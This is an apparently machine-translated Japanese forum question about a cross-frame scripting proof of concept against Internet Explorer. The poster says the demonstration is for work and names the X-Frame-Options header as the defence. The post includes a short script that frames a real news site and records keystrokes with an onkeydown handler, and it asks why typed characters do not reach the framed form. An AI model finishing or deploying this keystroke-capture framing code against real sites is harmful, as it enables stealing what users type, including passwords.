クロス フレーム スクリプティング攻撃 ( https://www.owasp.org/index.php/Cross_Frame_Scripting )の PoC を実行して、どのバージョンの IE ブラウザーに対してもこの攻撃がどれほど危険であるかを仕事で示しようとしています。X-FRAME-OPTIONS: denyこの攻撃は、IE8 以降のバージョンでヘッダーを使用することで簡単に防ぐことができます。しかし、すべての開発者がすべての Web サーバー応答にそのようなヘッダーを含めるとよいでしょう。以下のコードを使用すると、アラート ウィンドウにキーコードが表示されますが、ターゲット ページのフォームの場合、フォーム内で押されたキーの文字が表示されません。
<script>
window.onkeydown = function() {
alert(window.event.keyCode);
}
</script>
<frameset onload="this.focus()" onblur="this.focus()">
<frame src="http://www.uol.com.br">
</frameset>
以下の簡単なコードを使用すると、キーを押して両方 (アラート ウィンドウとフォーム内の文字) を見ることができます。
<script>
window.onkeydown = function() {
alert(window.event.keyCode);
}
</script>
<input>
最初のコード ブロックに欠けているものはありますか? ありがとう!